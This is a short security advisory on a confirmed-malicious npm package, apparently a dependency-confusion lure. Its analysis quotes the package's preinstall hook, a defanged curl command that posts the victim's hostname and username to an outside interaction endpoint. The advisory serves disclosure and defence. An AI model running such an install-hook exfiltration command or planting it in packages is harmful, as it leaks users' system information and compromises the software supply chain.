LWA-2026-4984 confirmed malware

redux-probe-unknown-action-rce@1.0.0

Malicious code in redux-probe-unknown-action-rce (npm)

T1059.004 · Unix ShellT1082 · System Information DiscoveryT1041 · Exfiltration Over C2 ChannelT1195.002 · Compromise Software Supply Chain

Analysis

A dependency-confusion targeting name with no functional code (index.js is an empty stub). Its preinstall hook runs `curl -X POST -d "info=$(hostname) $(whoami)" hxxp://d22bct11og85ukurvqe0fwmajus9fyr9j[.]oast[.]online` on every install, exfiltrating the victim's hostname and username to that out-of-band interaction endpoint. The package description calls itself a PoC, but there is no repository URL or program reference to verify any research claim.

analyzed by
Leitwacht
first seen
Jun 13, 2026, 04:23 AM
analyzed
Jun 13, 2026, 04:26 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.